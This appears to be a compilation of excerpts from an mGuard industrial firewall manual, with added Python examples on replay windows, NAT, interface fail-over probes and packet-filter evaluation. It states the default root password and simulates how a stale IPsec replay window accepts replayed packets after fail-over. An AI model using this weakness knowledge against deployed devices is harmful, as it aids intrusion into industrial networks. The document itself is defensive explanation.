228. ...Internet connection is required for this. 7 Authentication menu. 7.1 Authentication >> Administrative Users. 7.1.1 Passwords. [Screenshot: tabs Passwords, RADIUS Filters; root: Root Password (Account root; Old Password; New Password; New Password again); admin: Administrator Password (Account admin; New Password; New Password again); user: Disable VPN until the user is authenticated via HTTP: Yes; User Password (New Password; New Password again).] Administrative Users refers to users who have the right, depending on their authorization level, to configure the mGuard (root and administrator authorization levels) or to use it (user authorization level). Authentication >> Administrative Users >> Passwords: To log into the corresponding authorization level, the user must enter the password assigned to the relevant authorization level (root, admin or user). root, Root Password: grants full rights to all parameters of the mGuard. Account root, background: only this authorization level allows unlimited access to the mGuard file system. User name (cannot be modified): root. Default root password: root. Change this default before the device is reachable from any untrusted network; a factory-default root password on a reachable management interface is an immediate compromise. To change the root password, enter the old password in the Old Password field, then the new password in the two corresponding fields below. admin: A
229. Authentication >> Certificates (tabs: CA Certificates, Remote Certificates, CRL, Certificate settings). Certificate settings: Check the validity period of certificates and CRLs; Enable CRL checking; CRL download interval (Never). The settings made here relate to all certificates and certificate chains that are to be checked by the mGuard. This generally excludes the following: self-signed certificates from partners, and all remote certificates for VPN. Check the validity period of certificates and CRLs: No: the validity period specified in certificates and CRLs is ignored by the mGuard. Wait for synchronization of the system time: the validity period specified in certificates and CRLs is only observed by the mGuard if the current date and time are known to the mGuard, either through the built-in clock (mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard centerport, mGuard industrial rs, mGuard delta, mGuard smart) or by synchronizing the system clock (see Time and Date on page 35). Until this point, all certificates to be checked are considered invalid for security reasons. Note for deployment: on a device without a battery-backed clock this setting means that certificate-authenticated access stays refused after a reboot until time synchronization succeeds, so the NTP path must not itself depend on that authentication. Enable CRL checking: Yes: when CRL checking is enabled, the mGuard consults the
230. ...es the PSKs being sent to the mGuard on standby for a prolonged period, an incorrect configuration remains concealed during this period, making it difficult to detect. 16.2.7 Interaction with other devices. Resolving host names: If host names are configured as VPN gateways, the mGuard devices in a redundant pair must be able to resolve the host names to the same IP address. This applies especially when DynDNS Monitoring (see page 253) is activated. If the host names are resolved on the mGuard on standby to another IP address, the VPN connection to this host is interrupted following a fail-over. The VPN connection is re-established through the other IP address directly after the fail-over; however, a short delay may occur, depending among other things on the value entered under DynDNS Monitoring for the Refresh Interval (sec). Obsolete IPsec replay window: IPsec data traffic is protected against replay. To this end each IPsec SA maintains an independent sequence number. The mGuard drops ESP packets whose sequence number has already been accepted for that SA (or that fall below the anti-replay window). This mechanism is known as the IPsec replay window. It prevents replay attacks, where an attacker resends previously recorded packets to impersonate another party or to re-inject old traffic. The IPsec replay window is only replicated sporadically during state synchronization, as it is very resource-int
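The replay window and the fail-over exposure described here and in the continuation (the standby starts from an obsolete window after a fail-over), as an added example that is not mGuard code: an RFC 4303 style sliding window over ESP sequence numbers, plus a scenario in which the active device accepted packets up to 300 but replicated its window only once, after packet 200. The sequence numbers, window size and synchronization point are constructed. One refinement the run makes visible: with a standard sliding window a single new packet from the genuine peer does not close the hole by itself; captured packets that still lie inside the window and were never marked as seen by the standby remain accepted until they age out of the window or the SA is rekeyed.

```python
"""ESP anti-replay window (RFC 4303 style) and the stale-window fail-over hole.
Added example, not mGuard code; sequence numbers and the sync point are constructed."""


class ReplayWindow:
    """Sliding window for one inbound SA. `top` is the highest sequence number
    accepted; bit i of `bitmap` is set when sequence number top - i was accepted."""

    def __init__(self, size: int = 64):
        self.size = size
        self.top = 0
        self.bitmap = 0
        self._mask = (1 << size) - 1

    def check_and_update(self, seq: int) -> bool:
        """True and record the packet if fresh; False for a replay or a packet
        older than the window. ESP sequence numbers start at 1."""
        if seq <= 0:
            return False
        if seq > self.top:                      # advance the window
            shift = seq - self.top
            self.bitmap = ((self.bitmap << shift) & self._mask) if shift < self.size else 0
            self.bitmap |= 1
            self.top = seq
            return True
        offset = self.top - seq
        if offset >= self.size:                 # fell off the left edge
            return False
        if self.bitmap & (1 << offset):         # already accepted once
            return False
        self.bitmap |= 1 << offset              # late but genuine
        return True

    def snapshot(self) -> tuple:
        return (self.top, self.bitmap)

    def restore(self, snap: tuple) -> None:
        self.top, self.bitmap = snap


def failover_scenario(window_size=64, synced_at=200, last_seen=300) -> dict:
    """The active device accepts 1..last_seen but replicated its window only
    once, after `synced_at`. At fail-over the standby restores that stale state
    while an attacker replays packets captured from the wire."""
    active = ReplayWindow(window_size)
    snap = None
    for seq in range(1, last_seen + 1):
        active.check_and_update(seq)
        if seq == synced_at:
            snap = active.snapshot()            # the only state the standby ever got
    standby = ReplayWindow(window_size)
    standby.restore(snap)

    results = {
        "active_rejects_replay": not active.check_and_update(250),
        "standby_accepts_replay": standby.check_and_update(250),   # the hole
        "second_replay_rejected": not standby.check_and_update(250),
        "too_old_rejected": not standby.check_and_update(100),
    }
    standby.check_and_update(last_seen + 1)     # genuine peer sends its next packet
    # Still inside the window and never marked as seen by the standby:
    results["in_window_replay_after_new_packet"] = standby.check_and_update(260)
    return results


if __name__ == "__main__":
    for name, value in failover_scenario().items():
        print(f"{name}: {value}")
```

The mitigation the page implies holds: the hole is bounded by the window size and closes on rekey, so short SA lifetimes and complete capture being required keep the exposure small, but it is not zero after the first fresh packet.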
231. ...access to all functions. By default the audit user role can only be activated via the mGuard device manager, in the same way as netadmin. 2.3 Input help during configuration (system messages): With firmware 8.0 or later, modified or invalid entries are highlighted in color on the web interface. With firmware 8.1 or later, dynamic values are displayed in red; in this way status messages indicating a current value can be recognized more easily. System messages, which explain why an entry is invalid, for example, are also displayed. The browser used must allow JavaScript for this support to function. [Figure 2.1: Example system message. The screenshot shows the banner "WARNING: THE ROOT PASSWORD IS NOT CONFIGURED / WARNING: THE ADMIN PASSWORD IS NOT CONFIGURED", the status line "Logged in as admin with role admin from 192.168.1.10 on mguard", the Management >> System Settings page (tabs System Settings, Web Settings, System Message, Licensing), the message "There are invalid values" and an Update button.] Modified entries are highlighted in blue on the relevant page and in the associated menu item until the changes are saved or reset (exception: modified tables). Invalid entries are highlighted in red on the relevant page and tab and in the associated menu item. The modified or invalid entries remain highlighted even when you close a menu. When necessary, information relating to the system is displayed at the top of the
232. ...established to the same session. When NAT is also activated, one or more locally connected computers can communicate with external computers by SIP via the mGuard. OPC Inspector: This function can only be activated when a suitable license key (OPC Inspector) is installed. With OPC Classic, communication always starts via port 135; the client and server then negotiate one or more additional connections on new ports. To enable these connections, all ports of an interconnected firewall previously had to be open. If OPC Classic is activated, it is enough to enable only port 135 for a client/server pair using the firewall rules. The mGuard inspects the user data of the packets (deep packet inspection): it checks in the user data sent via this port whether a new connection has been negotiated and opens the negotiated port. To do so, communication between the client and the server on port 135 must be enabled in both directions. Because the helper opens pinholes based on payload content, restrict which peers may reach port 135 at all, rather than relying on the inspection alone. If OPC Classic is activated, NAT procedures can be used. If masquerading is to be used, port forwarding of port 135 to the OPC server/client must be activated on the LAN interface of the mGuard. If the Sanity check for OPC Classic is activated, only OPC packets may be transmitted via OPC Classic port 135 and the newly negotiated ports. Network Security >> Packet Filter >> Advanced, Timeout for OPC Classic: configures the timeout during which OPC traffic is expected si
233. Network >> Interfaces >> General, Stealth network mode, Static Stealth Configuration / Secondary External Interface. This menu item is not included in the scope of functions for the mGuard rs2000 3G / mGuard rs2000. If this option is used, make the relevant entries afterwards. If it is not used, the affected data packets are routed via the default gateway specified for the client. Networks to be routed over alternative gateways: Network: specify the network in CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). Gateway: the gateway via which this network can be accessed. The routes specified here are mandatory routes for data packets created by the mGuard. This setting has priority over other settings. See also Network example diagram on page 25. Client's IP address: the IP address of the computer connected to the LAN port. Client's MAC address: the physical address of the network card of the local computer to which the mGuard is connected. The MAC address can be determined as follows: in DOS (Start > Programs > Accessories > Command Prompt) enter the command ipconfig /all. The MAC address does not necessarily have to be specified; the mGuard can automatically obtain the MAC address from the client. The all-zero MAC address 0:0:0:0:0:0 must be set in order to do this. Please note that the mGuard can only forward network packets to the client once the MAC address of the cli
234. Network Address Translation (NAT), also known as IP masquerading, hides an entire network behind a single device known as a NAT router. If you communicate externally via a NAT router, the internal computers in the local network and their IP addresses remain hidden; the remote communication partner only sees the NAT router with its IP address. In order to allow internal computers to communicate directly with external computers on the Internet, the NAT router must modify the IP datagrams that are sent from internal computers to remote partners and received by internal computers from remote partners. If an IP datagram is sent from the internal network to a remote partner, the NAT router modifies the IP header and the UDP or TCP header of the datagram, replacing the source IP address and source port with its own official IP address and a previously unused port. For this purpose the NAT router uses a table in which the original values are listed together with the corresponding new ones. When a response datagram is received, the NAT router uses the destination port to recognize that the datagram is intended for an internal computer. Using the table, the NAT router replaces the destination IP address and port before forwarding the datagram via the internal network. Hiding addresses is not access control: any inbound packet that matches an existing table entry is forwarded, so the firewall rules, not NAT, decide who may reach the internal hosts. Port: A port number is assigned to each endpoint in UDP and TCP protocol-based communication. This number makes it possible to differentiate between multiple UDP or TCP connections betwe
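The translation table described above, as an added example that is not mGuard code: a masquerading router that rewrites the source of outbound packets to its public address and a freshly allocated port, records the mapping, and uses the destination port of replies to find the internal host again. Addresses, packets and the public IP are constructed. Two choices beyond the glossary text are assumptions of this example rather than documented mGuard behaviour: public ports are chosen at random (sequential ports let an off-path attacker guess a live 5-tuple), and an inbound packet is dropped when its remote endpoint differs from the one that opened the flow.

```python
"""Masquerading (source NAT) with a translation table. Added example, not
mGuard code; addresses and packets are constructed; random port choice and
endpoint filtering on inbound packets are hardening choices assumed here."""
import random


class NatRouter:
    def __init__(self, public_ip: str, port_range=(1024, 65535), seed=None):
        self.public_ip = public_ip
        self.lo, self.hi = port_range
        self.rng = random.Random(seed)
        # (proto, int_ip, int_port, ext_ip, ext_port) -> public source port
        self.outbound_map = {}
        # (proto, public_port) -> (int_ip, int_port, ext_ip, ext_port)
        self.inbound_map = {}

    def _allocate_port(self, proto: str) -> int:
        for _ in range(10_000):
            port = self.rng.randint(self.lo, self.hi)
            if (proto, port) not in self.inbound_map:
                return port
        raise RuntimeError("NAT port pool exhausted")

    def translate_outbound(self, pkt: dict) -> dict:
        """Rewrite src/sport of an internal packet; create the table entry on first use."""
        key = (pkt["proto"], pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
        public_port = self.outbound_map.get(key)
        if public_port is None:
            public_port = self._allocate_port(pkt["proto"])
            self.outbound_map[key] = public_port
            self.inbound_map[(pkt["proto"], public_port)] = key[1:]
        return dict(pkt, src=self.public_ip, sport=public_port)

    def translate_inbound(self, pkt: dict):
        """Map a packet addressed to the public IP back to the internal host.
        Returns None (drop) when there is no entry or the remote endpoint differs."""
        if pkt["dst"] != self.public_ip:
            return None
        entry = self.inbound_map.get((pkt["proto"], pkt["dport"]))
        if entry is None:
            return None                        # unsolicited inbound packet
        int_ip, int_port, ext_ip, ext_port = entry
        if (pkt["src"], pkt["sport"]) != (ext_ip, ext_port):
            return None                        # not the peer that opened the flow
        return dict(pkt, dst=int_ip, dport=int_port)


def demo(seed=7) -> dict:
    """Constructed flow: internal host 192.168.1.10 fetches a web page."""
    nat = NatRouter("198.51.100.1", seed=seed)
    out = {"proto": "tcp", "src": "192.168.1.10", "sport": 40000,
           "dst": "203.0.113.80", "dport": 80}
    first = nat.translate_outbound(out)
    again = nat.translate_outbound(out)         # same flow reuses the same public port
    reply = {"proto": "tcp", "src": "203.0.113.80", "sport": 80,
             "dst": "198.51.100.1", "dport": first["sport"]}
    back = nat.translate_inbound(reply)
    spoofed = dict(reply, src="203.0.113.99")  # other peer aiming at the open port
    stray = dict(reply, dport=1)                # port with no table entry
    return {
        "public_port_stable": first["sport"] == again["sport"],
        "reply_delivered_to": (back["dst"], back["dport"]) if back else None,
        "spoofed_dropped": nat.translate_inbound(spoofed) is None,
        "stray_dropped": nat.translate_inbound(stray) is None,
    }


if __name__ == "__main__":
    print(demo())
```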
235. Interface used for state synchronization, Dedicated Interface: The mGuard centerport supports a dedicated interface. This is a reserved direct Ethernet interface or a dedicated LAN segment via which the state synchronization is sent. The redundant pair can be connected through an additional dedicated Ethernet interface or an interconnected switch. On a dedicated interface, presence notifications (CARP) are also listened for on the third Ethernet interface. Presence notifications (CARP) are also transmitted when the mGuard is active. However, no additional routing is supported for this interface: frames received on this interface are not forwarded, for security reasons. Keep this segment physically isolated; the synchronization traffic carries live connection state and VPN credentials, so it must not be reachable from production networks. The connection status of the third Ethernet interface can be queried via SNMP. Redundancy >> Firewall Redundancy >> Redundancy, IP of the dedicated interface (only available when Dedicated Interface is selected): IP: IP address used on the third network interface of the mGuard centerport for state synchronization with the other mGuard. Default: 192.168.68.29. Netmask: subnet mask used on the third network interface of the mGuard centerport for state synchronization with the other mGuard. Default: 255.255.255.0. Use VLAN: when Yes is selected, a VLAN ID is used for the third network interface. VLAN ID (1 to 4094, default 1): VLAN ID when this setting is activated. Disable the avai
236. ...specifies the following: the secondary external interface is only activated when specific conditions are met, and it is only then that the routing settings of the secondary external interface take effect. Network address 0.0.0.0/0 generally refers to the largest definable network, i.e. the Internet. In Router network mode, the local network connected to the mGuard can be accessed via the secondary external interface as long as the specified firewall settings allow this. Network >> Interfaces >> General (continued), Secondary External Interface (continued), Network mode: Built-in mobile network modem, Operation Mode: temporary, Probes for activation. [Screenshot: Network Mode: Built-in mobile network modem; Operation Mode: temporary; Secondary External Routes: 192.168.3.0/24 via gateway; Current state of activation: On standby; Probes for activation: the secondary external interface is activated only if all probes fail and if the operation mode is set to temporary; probe: ICMP Ping 141.1.1.1; Probe Interval (seconds): 20; Number of times all probes need to fail during subsequent runs before the secondary external interface is activated: 2; DNS Mode: use primary DNS settings untouched; User-defined name servers, if they should be reachable via the secondary e
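The activation rule shown in the screenshot (temporary operation mode: activate only when all probes fail in the configured number of consecutive runs), as an added example that is not mGuard code. The probe names, results and thresholds are constructed; the page does not state when the interface returns to standby, so the rule used here (back to standby as soon as any probe succeeds, which also resets the failure counter) is an assumption.

```python
"""Probe-driven activation of a temporary secondary external interface.
Added example, not mGuard code; probes and results are constructed, and the
deactivation rule (any success returns to standby) is an assumption."""


class SecondaryInterfaceController:
    STANDBY, ACTIVE = "On standby", "Active"

    def __init__(self, probes, runs_to_fail: int = 2):
        if not probes or runs_to_fail < 1:
            raise ValueError("need at least one probe and a positive run count")
        self.probes = list(probes)           # e.g. ["ping:141.1.1.1"]
        self.runs_to_fail = runs_to_fail
        self.consecutive_failures = 0
        self.state = self.STANDBY

    def run_once(self, results: dict) -> str:
        """Feed one probe run (probe name -> True if it succeeded); return the new state."""
        missing = set(self.probes) - set(results)
        if missing:
            raise KeyError(f"no result for probes {sorted(missing)}")
        all_failed = not any(results[p] for p in self.probes)
        if all_failed:
            self.consecutive_failures += 1
            if self.consecutive_failures >= self.runs_to_fail:
                self.state = self.ACTIVE
        else:
            # One reachable target proves the primary path works: a partial
            # outage never flips the interface, and the run count restarts.
            self.consecutive_failures = 0
            self.state = self.STANDBY
        return self.state


def demo() -> list:
    """Five constructed probe runs with two targets and runs_to_fail=2."""
    ctl = SecondaryInterfaceController(["ping:141.1.1.1", "ping:192.0.2.1"], runs_to_fail=2)
    runs = [
        {"ping:141.1.1.1": False, "ping:192.0.2.1": True},    # partial failure
        {"ping:141.1.1.1": False, "ping:192.0.2.1": False},   # first total failure
        {"ping:141.1.1.1": False, "ping:192.0.2.1": False},   # second: activate
        {"ping:141.1.1.1": True,  "ping:192.0.2.1": False},   # primary path back
        {"ping:141.1.1.1": False, "ping:192.0.2.1": False},   # counter restarted at 1
    ]
    return [ctl.run_once(r) for r in runs]


if __name__ == "__main__":
    print(demo())
```

Design note: the probe targets are, by construction, reachable only through the primary path, so whoever can make those specific targets unreachable can force traffic onto the mobile link, where different firewall rules and costs may apply. Use several independent targets and treat a fail-over event as something to alert on.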
237. ...for proxy server login. Password: password for proxy server login. 6.7 Network >> Mobile Network. This menu is only available on the mGuard rs4000/rs2000 3G. The mGuard rs4000/rs2000 3G supports the establishment of a WAN via mobile network. The following mobile network standards are supported: 3G (UMTS, HSDPA), CDMA EV-DO, EDGE, GPRS. In addition, the GPS and GLONASS positioning systems are supported for positioning and time synchronization. Note that the time synchronization and position data from the positioning systems can be manipulated by interference signals (GPS spoofing); because certificate and CRL validity checks depend on the system time, a spoofed time source can influence authentication decisions. Establishing a mobile network connection: To establish a mobile network connection, a matching antenna must be connected to the device (see device user documentation). The mGuard also requires at least one valid mini-SIM card (ID-000 format) via which it registers and authenticates itself to a mobile network. The mGuard rs4000/rs2000 3G can be equipped with two SIM cards. The SIM card in the SIM 1 slot is the primary SIM card, which is normally used to establish the connection. If this connection fails, the device can turn to the second SIM card in slot SIM 2. You can set whether and under which conditions the connection to the primary SIM card is restored. The state of the SIM cards is indicated via two LEDs on the front of the mGuard rs4000/rs2000 3G. The LEDs
238. ...format (see CIDR (Classless Inter-Domain Routing) on page 24). From Port / To Port: only evaluated for the TCP and UDP protocols. any refers to any port; startport:endport (e.g. 110:120) refers to a port range. Individual ports can be specified using the port number or the corresponding service name, e.g. 110 for pop3 or pop3 for 110. Network Security >> Packet Filter >> Rule Records, Action: Accept means that the data packets may pass through. Reject means that the data packets are sent back and the sender is informed of their rejection; in Stealth mode, Reject has the same effect as Drop. Drop means that the data packets are not permitted to pass through; they are discarded, which means that the sender is not informed of their whereabouts. Name of rule sets (if defined): when a name is specified for rule sets, the firewall rules saved under this name take effect. Comment: freely selectable comment for this rule. Log: for each firewall rule you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, the default setting). If a connection associated with a firewall rule record has been established and is continuously creating data traffic, deactivation of the firewall rule record might not interrupt this connection as expected. This happens because the outgoing response
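The two rule-evaluation behaviours the manual describes, first-match from the top of the list (section 215 above: later rules that would also match are ignored) and the port specification forms (any, a single port or service name, startport:endport) together with Accept/Reject/Drop and Reject behaving like Drop in Stealth mode, as one added example that is not mGuard code. The rule table, packets, service-name subset and field names are constructed; the mGuard's real rule schema has more fields (interface, rule records, logging IDs) than this model.

```python
"""First-match packet-filter evaluation with mGuard-style port specs.
Added example, not mGuard code. Rules, packets and the service-name table are
constructed; field names (proto, src, dst, sport, dport) are assumptions."""
import ipaddress
from dataclasses import dataclass

# Service-name lookup as the manual describes (110 for pop3, pop3 for 110).
# Constructed subset; a real resolver would consult /etc/services.
SERVICES = {"ssh": 22, "http": 80, "pop3": 110, "https": 443}


def parse_port_spec(spec: str) -> tuple:
    """'any' -> (0, 65535); 'pop3' or '110' -> (110, 110); '110:120' -> (110, 120)."""
    spec = spec.strip().lower()
    if spec == "any":
        return (0, 65535)
    parts = spec.split(":", 1)
    nums = [int(SERVICES.get(p, p)) for p in parts]
    lo, hi = nums[0], nums[-1]
    if not 0 <= lo <= hi <= 65535:
        raise ValueError(f"bad port spec {spec!r}")
    return (lo, hi)


@dataclass(frozen=True)
class Rule:
    proto: str        # 'tcp', 'udp', 'icmp' or 'all'
    src: str          # CIDR; 0.0.0.0/0 = any
    dst: str
    from_port: str    # only evaluated for tcp/udp
    to_port: str
    action: str       # 'accept', 'reject' or 'drop'
    log: bool = False

    def matches(self, pkt: dict) -> bool:
        if self.proto != "all" and self.proto != pkt["proto"]:
            return False
        if ipaddress.ip_address(pkt["src"]) not in ipaddress.ip_network(self.src, strict=False):
            return False
        if ipaddress.ip_address(pkt["dst"]) not in ipaddress.ip_network(self.dst, strict=False):
            return False
        if pkt["proto"] in ("tcp", "udp"):          # ports are ignored for icmp etc.
            lo, hi = parse_port_spec(self.from_port)
            if not lo <= pkt["sport"] <= hi:
                return False
            lo, hi = parse_port_spec(self.to_port)
            if not lo <= pkt["dport"] <= hi:
                return False
        return True


def evaluate(rules, pkt: dict, default="drop", stealth=False) -> tuple:
    """Walk the list top-down; the first matching rule decides and later rules
    are ignored. Returns (action, rule_index, log); rule_index is None when no
    rule matched and the default policy applied. In Stealth mode a Reject
    behaves like Drop (nothing is sent back to the sender)."""
    for index, rule in enumerate(rules):
        if rule.matches(pkt):
            action = rule.action
            if stealth and action == "reject":
                action = "drop"
            return (action, index, rule.log)
    return (default, None, False)


# Constructed incoming ruleset: SSH from the management network is accepted and
# logged, SSH from anywhere else is rejected, everything else is accepted. The
# final broad Accept never rescues port-22 traffic because rule 1 matches first.
INCOMING_RULES = [
    Rule("tcp", "10.0.0.0/8", "0.0.0.0/0", "any", "ssh", "accept", log=True),
    Rule("tcp", "0.0.0.0/0", "0.0.0.0/0", "any", "22", "reject"),
    Rule("all", "0.0.0.0/0", "0.0.0.0/0", "any", "any", "accept"),
]

if __name__ == "__main__":
    for pkt in (
        {"proto": "tcp", "src": "203.0.113.7", "dst": "192.168.1.1", "sport": 51000, "dport": 22},
        {"proto": "tcp", "src": "10.1.2.3", "dst": "192.168.1.1", "sport": 51001, "dport": 22},
        {"proto": "icmp", "src": "203.0.113.7", "dst": "192.168.1.1"},
    ):
        print(pkt["proto"], pkt["src"], "->", evaluate(INCOMING_RULES, pkt))
```

A useful check before committing a ruleset: run the packets you expect to be blocked through the list and confirm which index answers; if the index is higher than you expected, an earlier rule is shadowing the one you wrote.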
239. [Screenshot: Domain for the hosts: example.local; Enabled: Yes; Resolve IP Addresses also: Yes; Hostnames table with one row: host, TTL 3600, IP 192.168.1.1.] Domain for the hosts: the name can be freely assigned, but it must adhere to the rules for assigning domain names. It is assigned to every host name. Enabled (Yes/No): switches the Local Resolving of Hostnames function on (Yes) or off (No) for the domain specified in the field above. Resolve IP Addresses also: No: the mGuard only resolves host names, i.e. it supplies the assigned IP address for host names. Yes: same as for No; it is also possible to determine the host names assigned to an IP address (reverse lookup). Hostnames: the table can have any number of entries. A host name may be assigned to multiple IP addresses; multiple host names may be assigned to one IP address. TTL: abbreviation for Time To Live. Value specified in seconds; default 3600 (1 hour). Specifies how long the returned assignment pairs may be stored in the cache of the calling computer. IP: the IP address assigned to the host name in this table row. Example: Local Resolving of Hostnames. The Local Resolving of Hostnames function is used in the following scenario, for example. A plant operates a number of identically structured machines, each one as a cell. The local networks of cells A, B and C are each connected to the plant network via the Internet using the mGua
240. ...from the PPPoE server. Otherwise the PPPoE service name is not used. PPPoE Service Name: PPPoE service name. Automatic Re-connect: if Yes is selected, specify the time in the Re-connect daily at field. This feature is used to schedule Internet disconnection and reconnection as required by many Internet service providers, so that they do not interrupt normal business operations. When this function is enabled, it only takes effect if synchronization with a time server has been carried out (see Management >> System Settings on page 33, Time and Date on page 35). Re-connect daily at: specified time at which the Automatic Re-connect function (see above) should be performed. Internal Networks: see Internal Networks on page 123. Secondary External Interface: see Secondary External Interface on page 116. Router network mode, PPTP router mode. [Screenshot: Network >> Interfaces >> General; Network Status: External IP address 172.16.66.49, Active default route 172.16.66.18, Used DNS servers 10.1.0.253; Network Mode: Router; Router Mode: PPTP; PPTP Login (example value shown); PPTP Password; local IP: Static (from field below).] When Router is selected as the network mode and PPTP is selected as the router mode: Network >> Interfaces >> Ge
...after it rings. If using the extended HAYES command set, append the character string "AT&S0=1 OK" (a space followed by AT&S0=1, followed by a space, followed by OK) to the initialization sequence.

Some external modems, depending on their default settings, require a physical connection to the DTR cable of the serial interface in order to operate correctly. Because the mGuard models do not provide this cable at the external serial interface, the character string "AT&D0 OK" (a space followed by AT&D0, followed by a space, followed by OK) must be appended to the above initialization sequence. According to the extended HAYES command set, this sequence means that the modem does not use the DTR cable.

If the external modem is to be used for outgoing calls, it is connected to a private branch exchange, and this private branch exchange does not generate a dial tone after the connection is opened, then the modem must be instructed not to wait for a dial tone before dialing. In this case, append the character string "ATX3 OK" (a space followed by ATX3, followed by a space, followed by OK) to the initialization sequence. In order to wait for the dial tone, the control character W should be inserted in the Phone number to call after the digit for dialing an outside line.

COM server for mGuard platforms
...The integrated switch controls port mirroring in order to monitor the network traffic. Here you can decide which ports you want to monitor, and the switch then sends copies of data packets from the monitored port to a selected port. The port mirroring function enables any packets to be forwarded to a specific recipient.

Receiver (only for devices with an internal switch): You can select the receiver port or the mirroring of the incoming and outgoing packets from each switch port.

MAU Configuration: Configuration and status indication of the Ethernet connections.

Port: Name of the Ethernet connection to which the row refers.

Media Type: Media type of the Ethernet connection.

Network >> Ethernet >> MAU settings

Automatic Configuration: Yes: tries to determine the required operating mode automatically. No: uses the operating mode specified in the Manual Configuration column. When connecting the EAGLE mGuard to a hub, please note the following: when Automatic Configuration is deactivated, the Auto MDIX function is also deactivated. This means that the port of the EAGLE mGuard must either be connected to the uplink port of the hub or connected to the hub using a cross-link cable.

Manual Configuration: The desired operating mode when Automatic Configuration is set to No.

Current Mode: The current operating mode of the netwo
...the new update must then first be obtained so that the required license file is available for the flashing process. This applies to major release upgrades, e.g. from Version 4.x.y to Version 5.x.y, to Version 6.x.y etc.

Management >> Licensing >> Overview

Basic settings

Feature License: Shows which functions are included with the installed mGuard licenses, e.g. the number of possible VPN tunnels, whether remote logging is supported etc.

4.3.2 Install

A VPN 1000 license can only be installed on the mGuard centerport. Only an MRU and LFS license can be installed on the mGuard rs2000 3G.

More functions can be added later to the mGuard license you have obtained. You will find a voucher serial number and a voucher key in the voucher included with the mGuard. The voucher can also be purchased separately. It can be used to:
• Request the required feature license file
• Install the license file that you receive following this request

[Screenshot residue: Management >> Licensing >> Install. Terms of License; Automatic License Installation: Voucher Serial Number, Voucher Key; Manual License Installation]

Management >> Licensing >> Install

Automatic License Installation: Voucher Serial Number, Voucher Key: Enter the serial number printed on the voucher and the corresponding voucher key, then
...original destination port specified in the incoming data packets. Either the port number or the corresponding service name can be specified here, e.g. pop3 for port 110 or http for port 80. This information is not relevant for the GRE protocol. It is ignored by the mGuard.

Redirect to IP: The internal IP address to which the data packets should be forwarded and into which the original destination addresses are translated.

Redirect to Port: The port to which the data packets should be forwarded and into which the original port data is translated. Either the port number or the corresponding service name can be specified here, e.g. pop3 for port 110 or http for port 80. This information is not relevant for the GRE protocol. It is ignored by the mGuard.

Comment: Freely selectable comment for this rule.

Log: For each individual port forwarding rule, you can specify whether the use of the rule
• should be logged (set Log to Yes)
• should not be logged (set Log to No, default setting)

6.4 Network >> DNS

6.4.1 DNS server

[Screenshot residue: Network >> DNS (tabs: DNS server, DynDNS). DNS: DNS cache state: Ready to resolve hostnames. Used DNS servers: 10.1.0.253. Servers to query: User defined servers (listed below). User defined name servers: 10.1.0.253. In Stealth Mode only "User defined" and "DNS Root Servers" are supported; other settings will be ignored.]

Loca
[Screenshot residue: ...Ignore NetBIOS over TCP traffic on TCP port 139: No]

Stealth Management IP Address: Here you can specify additional IP addresses to administrate the mGuard. If you have set Stealth configuration to "multiple clients", remote access will only be possible using this IP address. An IP address of 0.0.0.0 disables this feature. Note: using a management VLAN is not supported in Stealth autodetect mode.

[Screenshot residue: Management IP addresses: 192.168.11.1 / 255.255.255.0 (No); 192.168.5.1 / 255.255.255.0 (No). Default gateway: 192.168.11.10. Static routes (the following settings are applied to traffic generated by the mGuard): 192.168.101.0/24 via 10.1.0.253. Secondary External Interface: Network Mode: Off. Static Stealth Configuration: Client's IP address 192.168.11.1; Client's MAC address 00:00:00:00:00:00]

Network >> Interfaces >> General: Stealth network mode (only applies if Stealth is selected as the network mode)

Network Mode: Stealth configuration: autodetect / static / multiple clients. Ignore NetBIOS over TCP traffic on TCP port 139.
• autodetect: The mGuard analyzes the network traffic and independently configures its network connection accordingly. It operates transparently.
• static: If the mGuard cannot analyze the network traffic, e.g. because the locally connected computer only receives data and d
...>> DynDNS

DynDNS Port: Only visible when DynDNS Provider is set to "DynDNS compatible". Name of the port for the DynDNS provider.

DynDNS Login, DynDNS Password: Enter the user name and password assigned by the DynDNS provider here.

DynDNS Hostname: The host name selected for this mGuard at the DynDNS service, providing you use a DynDNS service and have entered the corresponding data above. The mGuard can then be accessed via this host name.

6.5 Network >> DHCP

The Dynamic Host Configuration Protocol (DHCP) can be used to automatically assign the network configuration set here to the computer connected directly to the mGuard. Under Internal DHCP you can specify the DHCP settings for the internal interface (LAN port), and under External DHCP the DHCP settings for the external interface (WAN port). The External DHCP menu item is not included in the scope of functions for the mGuard rs2000.

The DHCP server also operates in Stealth mode. In multi-stealth mode, the external DHCP server of the mGuard cannot be used if a VLAN ID is assigned as the management IP.

IP configuration for Windows computers: when you start the DHCP server of the mGuard, you can configure the locally connected computers so that they obtain their IP addresses automatically. Under Windows XP:
• In the Start menu, select Control Panel, Network Connections.
• Right-click
...configuration profile saved on the mGuard by the user:
• Click on Restore to the right of the name of the relevant configuration profile. The corresponding configuration profile is activated.

Saving the configuration profile as a file on the configuration computer:
• Click on Download to the right of the name of the relevant configuration profile.
• In the dialog box that is displayed, specify the file name and folder under which the configuration profile is to be saved as a file. The file name can be freely selected.

Deleting a configuration profile:
• Click on Delete to the right of the name of the relevant configuration profile. The Factory Default profile cannot be deleted.

Saving the active configuration as a configuration profile on the mGuard:
• Enter the desired profile name in the Name for the new profile field next to Save Current Configuration to Profile.
• Click on Save. The configuration profile is saved on the mGuard, and the name of the profile appears in the list of profiles already stored on the mGuard.

Management >> Configuration Profiles (tabs: Configuration Profiles, External Config Storage (ECS))

Upload Configuration to Profile: Uploading a configuration profile that has been saved to a file on the configuration computer. Requirement: a configuration profile has been saved on the configuration computer as a file according to the procedure described above.
• E
...0.0.0.0/0 stands for all addresses, i.e. in this case no filtering is applied according to the IP address of the sender. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24).

QoS >> Ingress Filters >> Internal/External

Columns: To IP | Current TOS/DSCP | Guaranteed | Upper Limit | Comment

To IP: Specifies that only data packets that should be forwarded to the specified IP address may pass through. Entries correspond to From IP as described above. 0.0.0.0/0 stands for all addresses, i.e. in this case no filtering is applied according to the IP address of the sender.

